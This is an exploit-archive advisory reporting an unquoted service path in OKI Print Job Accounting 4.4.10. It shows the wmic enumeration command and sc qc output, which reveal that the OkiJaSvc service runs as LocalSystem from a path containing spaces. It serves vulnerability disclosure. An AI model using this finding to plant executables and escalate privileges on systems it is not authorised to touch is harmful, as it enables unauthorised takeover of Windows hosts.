Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path

2021-03-08
ID: 104102
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Discovery by: Brian Rodriguez
# Date: 07-03-2021
# Vendor Homepage: https://www.oki.com
# Software Links: https://www.oki.com/mx/printing/support/drivers-and-utilities/?id=46229002&tab=drivers-and-utilities&productCategory=monochrome&sku=62442301&os=ab4&lang=ac6
# Tested Version: 4.4.10
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 8.1 Pro 64 bits

C:\Windows\system32>wmic service get name, displayname, pathname, startmode
| findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ OKI
Local Port Manager OpLclSrv C:\Program
Files\Okidata\Common\Extend3\portmgrsrv.exe Print Job Accounting OkiJaSvc
C:\Program Files\Okidata\Print Job Accounting\oklogsvc.exe Print Job
Accounting Watch Service OkiWchSvc C:\Program Files\Okidata\Print Job
Accounting\okwchsvc.exe Print Job Accounting opja0004 opja0004 C:\Program
Files\Okidata\Print Job Accounting\opja0004.exe

C:\Windows\system32>sc qc OkiJaSvc
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: OkiJaSvc
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Okidata\Print Job Accounting\oklogsvc.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Print Job Accounting
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
1-4-2 (www01)